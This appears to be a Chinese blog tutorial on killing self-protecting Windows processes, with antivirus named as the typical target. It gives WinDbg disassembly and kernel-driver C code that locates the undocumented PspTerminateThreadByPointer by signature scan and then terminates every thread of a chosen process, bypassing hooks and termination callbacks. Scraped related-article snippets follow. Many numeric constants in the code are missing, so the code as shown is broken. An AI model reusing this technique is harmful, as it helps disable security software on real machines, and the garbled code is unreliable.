windows平台中,某些进程做了各种保护,比如hook了terminateProcess,又或者注册了进程终止函数的回调。当调用这些API或任务管理器终止该进程时,会被绕过,典型如某些杀毒软件,怎么才能终止这些进程了?

进程是由线程组成的,如果该进程名下所有线程都终止,此进程也会被windows回收和注销,终止进程的问题就转化成了终止线程;但如果直接调用terminateThread,同样面临terminateProcess被hook的窘境。深入逆向分析terminateThread后发现,真正终止线程的函数是PspTerminateThreadByPointer,整个调用逻辑为:NtTerminateThread->PsTerminateSystemThread->PspTerminateThreadByPointer,其中PsTerminateSystemThread是导入未文档化函数,可在驱动层掉用MmGetSystemRoutineAddress函数获取地址,进而得到PspTerminateThreadByPointer的地址(当然也能使用https://www.cnblogs.com/theseventhson/p/13024325.html该方法获取),核心函数如下:

1、根据起始和终止地址、特征码查找代码偏移

PVOID SearchMemory(PVOID pStartAddress, PVOID pEndAddress, PUCHAR pMemoryData, ULONG ulMemoryDataSize)

{

    PVOID pAddress = NULL;

    PUCHAR i = NULL;

    ULONG m = ;

    // 扫描内存

    for (i = (PUCHAR)pStartAddress; i < (PUCHAR)pEndAddress; i++)

    {

        // 判断特征码

        for (m = ; m < ulMemoryDataSize; m++)

        {

            if (*(PUCHAR)(i + m) != pMemoryData[m])

            {

                break;

            }

        }

        // 判断是否找到符合特征码的地址

        if (m >= ulMemoryDataSize)

        {

            // 找到特征码位置, 获取紧接着特征码的下一地址

            pAddress = (PVOID)(i + ulMemoryDataSize);

            break;

        }

    }

    return pAddress;

}

2、(1)PsTerminateSystemThread是导出未文档化的函数,可以直接用MmGetSystemRoutineAddress得到函数地址

(2)windbg中根据PsTerminateSystemThread进一步查找PspTerminateThreadByPointer:这里用了e8作为特征码,直接定位到“e8dcf0fbff      call    nt!PspTerminateThreadByPointer (fffff803`d01c6210)”这行代码;

kd> u 0xfffff803`d0207110   //下面偏移x20 = 32byte处

nt!PsTerminateSystemThread:

fffff803`d0207110 4883ec28        sub     rsp,28h

fffff803`d0207114 8bd1            mov     edx,ecx

fffff803`d0207116 65488b0c2588010000 mov   rcx,qword ptr gs:[188h]

fffff803`d020711f f7417400040000  test    dword ptr [rcx+74h],400h

fffff803`d0207126 0f84a0630e00    je      nt!PsTerminateSystemThread+0xe63bc (fffff803`d02ed4cc)

fffff803`d020712c 41b001          mov     r8b,1

fffff803`d020712f e8dcf0fbff      call    nt!PspTerminateThreadByPointer (fffff803`d01c6210)

  熟悉x86汇编的都知道:e8是call的硬编码,后面dcf0fbff是目标地址当对于当前的偏移,偏移为0xfffbf0dc。这个偏移很大,根据经验判断应该是个负数,0n-266020,那么PspTerminateThreadByPointer的计算方法:

  PspTerminateThreadByPointer =  当前地址 + 4 + 偏移(负数)

=0xfffff800`63f7e130 + 0x4 + 0n-266020

= ‭FFFFF80063F7E134‬ + 0n-266020

= -8,794,415,832,780 - 266020 //统一转成10进制

= -8,794,416,098,800‬

= FFFF F800 63F3 D210‬

继续windbg查一下:发现这个地址确实是PspTerminateThreadByPointer的,没错:

kd> u 0xfffff800`63f3d210

nt!PspTerminateThreadByPointer:

fffff800`63f3d210 48895c2408      mov     qword ptr [rsp+8],rbx

fffff800`63f3d215 48896c2410      mov     qword ptr [rsp+10h],rbp

fffff800`63f3d21a 4889742418      mov     qword ptr [rsp+18h],rsi

fffff800`63f3d21f 57              push    rdi

fffff800`63f3d220 4883ec30        sub     rsp,30h

fffff800`63f3d224 8b81d0060000    mov     eax,dword ptr [rcx+6D0h]

fffff800`63f3d22a 418ae8          mov     bpl,r8b

fffff800`63f3d22d 488bb920020000  mov     rdi,qword ptr [rcx+220h]

  详细代码如下(这里pSpecialData用E8就好):

PVOID SearchPspTerminateThreadByPointer(PUCHAR pSpecialData, ULONG ulSpecialDataSize)

{

    UNICODE_STRING ustrFuncName;

    PVOID pAddress = NULL;

    LONG lOffset = ;

    PVOID pPsTerminateSystemThread = NULL;

    PVOID pPspTerminateThreadByPointer = NULL;

    // 先获取 PsTerminateSystemThread 函数地址

    RtlInitUnicodeString(&ustrFuncName, L"PsTerminateSystemThread");

    pPsTerminateSystemThread = MmGetSystemRoutineAddress(&ustrFuncName);

    if (NULL == pPsTerminateSystemThread)

    {

        ShowError("MmGetSystemRoutineAddress", );

        return pPspTerminateThreadByPointer;

    }

    // 然后, 查找 PspTerminateThreadByPointer 函数地址

    pAddress = SearchMemory(pPsTerminateSystemThread,

        (PVOID)((PUCHAR)pPsTerminateSystemThread + 0xFF),//搜索255字节长度

        pSpecialData, ulSpecialDataSize);

    if (NULL == pAddress)

    {

        ShowError("SearchMemory", );

        return pPspTerminateThreadByPointer;

    }

    // 先获取偏移, 再计算地址

    lOffset = *(PLONG)pAddress;//0n-266020。注意这里向前跳,偏移是负数,有符号

    pPspTerminateThreadByPointer = (PVOID)((PUCHAR)pAddress + sizeof(LONG) + lOffset);

    return pPspTerminateThreadByPointer;

}

3、得到PspTerminateThreadByPointer地址:

PVOID GetPspLoadImageNotifyRoutine()

{

    PVOID pPspTerminateThreadByPointerAddress = NULL;

    RTL_OSVERSIONINFOW osInfo = {  };

    UCHAR pSpecialData[] = {  };

    ULONG ulSpecialDataSize = ;

    pSpecialData[] = 0xE8;

    ulSpecialDataSize = ;

    // E8

    pSpecialData[] = 0xE8;

    ulSpecialDataSize = ;

    // 根据特征码获取地址

    pPspTerminateThreadByPointerAddress = SearchPspTerminateThreadByPointer(pSpecialData, ulSpecialDataSize);

    return pPspTerminateThreadByPointerAddress;

}

4、现在可以强杀进程了:

// 强制结束指定进程

NTSTATUS ForceKillProcess(HANDLE hProcessId)

{

    PVOID pPspTerminateThreadByPointerAddress = NULL;

    PEPROCESS pEProcess = NULL;

    PETHREAD pEThread = NULL;

    PEPROCESS pThreadEProcess = NULL;

    NTSTATUS status = STATUS_SUCCESS;

    ULONG i = ;

#ifdef _WIN64

    // 64 位

    typedef NTSTATUS(__fastcall *PSPTERMINATETHREADBYPOINTER) (PETHREAD pEThread, NTSTATUS ntExitCode, BOOLEAN bDirectTerminate);

#else

    // 32 位

    typedef NTSTATUS(*PSPTERMINATETHREADBYPOINTER) (PETHREAD pEThread, NTSTATUS ntExitCode, BOOLEAN bDirectTerminate);

#endif

    // 获取 PspTerminateThreadByPointer 函数地址

    pPspTerminateThreadByPointerAddress = GetPspLoadImageNotifyRoutine();

    if (NULL == pPspTerminateThreadByPointerAddress)

    {

        ShowError("GetPspLoadImageNotifyRoutine", );

        return FALSE;

    }

    // 获取结束进程的进程结构对象EPROCESS

    status = PsLookupProcessByProcessId(hProcessId, &pEProcess);

    if (!NT_SUCCESS(status))

    {

        ShowError("PsLookupProcessByProcessId", status);

        return status;

    }

    // 遍历所有线程, 并结束所有指定进程的线程

    for (i = ; i < 0x80000; i = i + )

    {

        status = PsLookupThreadByThreadId((HANDLE)i, &pEThread);

        if (NT_SUCCESS(status))

        {

            // 获取线程对应的进程结构对象

            pThreadEProcess = PsGetThreadProcess(pEThread);

            // 结束指定进程的线程

            if (pEProcess == pThreadEProcess)

            {

                ((PSPTERMINATETHREADBYPOINTER)pPspTerminateThreadByPointerAddress)(pEThread, , );

                DbgPrint("PspTerminateThreadByPointer Thread:%d\n", i);

            }

            // 凡是Lookup...,必需Dereference,否则在某些时候会造成蓝屏

            ObDereferenceObject(pEThread);

        }

    }

    // 凡是Lookup...,必需Dereference,否则在某些时候会造成蓝屏

    ObDereferenceObject(pEProcess);

    return status;

}

5、测试环境:

windows:进程查杀的更多相关文章

  1. Linux 僵尸进程查杀

    僵尸进程概念 僵尸进程(Zombie process)通俗来说指那些虽然已经终止的进程,但仍然保留一些信息,等待其父进程为其收尸. 书面形式一点:一个进程结束了,但是他的父进程没有等待(调用wait ...

  2. windows查看端口占用情况及查杀进程

    我们平时在做web开发运行web服务器或运行某个应用时会报错,提示该应用的端口号已被占用,我们可以用以下的方法解决. 解决方法一:重新为应用配置端口. 解决方法二:找到占用端口的应用并关闭该应用释放占 ...

  3. shell脚本执行查找进程,然后查杀进程

    shell 执行查找进程,然后查杀进程脚本如下: ps -ef | grep 'IOE' |grep -v 'grep'| awk '{print \$2}' |while read pid; do ...

  4. centos clamav杀毒软件安装配置及查杀,没想到linux下病毒比windows还多!

    centos clamav杀毒软件安装配置及查杀,没想到linux下病毒比windows还多! 一.手动安装 1.下载(官网)    cd /soft     wget http://www.clam ...

  5. 查杀进程小工具——WPF和MVVM初体验

    最近因为工作需要,研究了一下桌面应用程序.在winform.WPF.Electron等几种技术里,最终选择了WPF作为最后的选型.WPF最吸引我的地方,就是MVVM模式了.MVVM模式完全把界面和业务 ...

  6. Linux进程管理:查杀进程

    一.查看进程 Linux下显示系统进程的命令ps,最常用的有ps -ef 和ps aux.这两个到底有什么区别呢? 两者没太大差别,讨论这个问题,要追溯到Unix系统中的两种风格,System V风格 ...

  7. Linux 僵尸进程的筛选和查杀

    一.筛选 ps -A -o stat,ppid,pid,cmd | grep -e '^[Zz]' 二.查杀 ps -A -o stat,ppid,pid,cmd | grep -e '^[Zz]' ...

  8. db2 查杀死锁进程

    db2 查杀死锁进命令 db2 get snapshot for locks on (需要snapshot的访问权限) db2 list applications db2 "force ap ...

  9. CMD查看进程ID并查杀进程

    开始-运行,输入CMD打开命令行界面,输入命令netstat -ano 结束该进程C:\>taskkill /f /t /im Wiz.exe 根据进程ID杀 >taskkill /F / ...

随机推荐

  1. Java基础笔记05-06-07-08

    五.今日内容介绍 1.方法基础知识 2.方法高级内容 3.方法案例 01方法的概述 * A: 为什么要有方法 * 提高代码的复用性 * B: 什么是方法 * 完成特定功能的代码块. 02方法的定义格式 ...

  2. CSS(三) - 定位模型 - float的几要素

    要点 1.浮动盒子会脱离文文档流,不会在占用空间. 2.非浮动元素几乎当浮动盒子根本不存在一样该怎么布局怎么布局不会被影响 3.非浮动元素中的文本内容会记住浮动元素的大小,并在排布时避开它,为其留出响 ...

  3. STM32H743 | FDCAN 波特率问题

    直奔主题,最近项目上接触了FDCAN,主控为STM32H743.在开发过程中存在了几点疑惑,特此记录. 波特率设置问题 CAN通讯的波特率计算方式为: BaudRate = Tq *(SYNC_SEG ...

  4. JVM 专题十一:运行时数据区(六)方法区

    1. 栈.堆.方法区关系交互 运行时数据区结构图: 从线程共享与否的角度来看: 2. 方法区的理解 2.1 方法区在哪里? <Java虚拟机规范>中明确说明:“尽管所有的方法区在逻辑上属于 ...

  5. java 基本语法(十三) 数组(六)数组的常见异常

    1.数组角标越界异常:ArrayIndexOutOfBoundsException int[] arr = new int[]{1,2,3,4,5}; // for(int i = 0;i <= ...

  6. 微博大数据即席查询(OLAP)引擎实践

    前言 适用于 即席查询 场景的开源查询引擎有很多,如:Elasticsearch.Druid.Presto.ClickHouse等:每种系统各有利弊,有的擅长检索,有的擅长统计:实践证明,All In ...

  7. js常见删除绑定的事件

    1. elem.onclick = null / false;  //直接解除 例子如下: var div = document.getElemetById('id'); div.onclick = ...

  8. PHP实现多继承

    题问php是否支持多继承? 答案:不可以,只支持单继承. 如何实现多继承呢? 答案:可以使用 interface 或 trait 实现 . interface这里我们就不做过多的说明了,它的原理就是一 ...

  9. CI/CD系列之阿里云云效2020应用篇

    目录 前言 实战 制品仓库 maven配置 项目pom配置 代码管理 流水线 参考资料 前言 前不久登录阿里云后台,看到云效的介绍,出于好奇便点进去看了看,刚开始以为云效是类似Jenkins的一套自动 ...

  10. Everything搜索表达式

    导出搜索列表为txt或csv ​ 索引最近变化 维持一个额外的按照最近变化排序的系统文件数据库,其可以通过 rc: 搜索,或以最近变化排序. ​ 搜索运行次数大于 100: runcount:> ...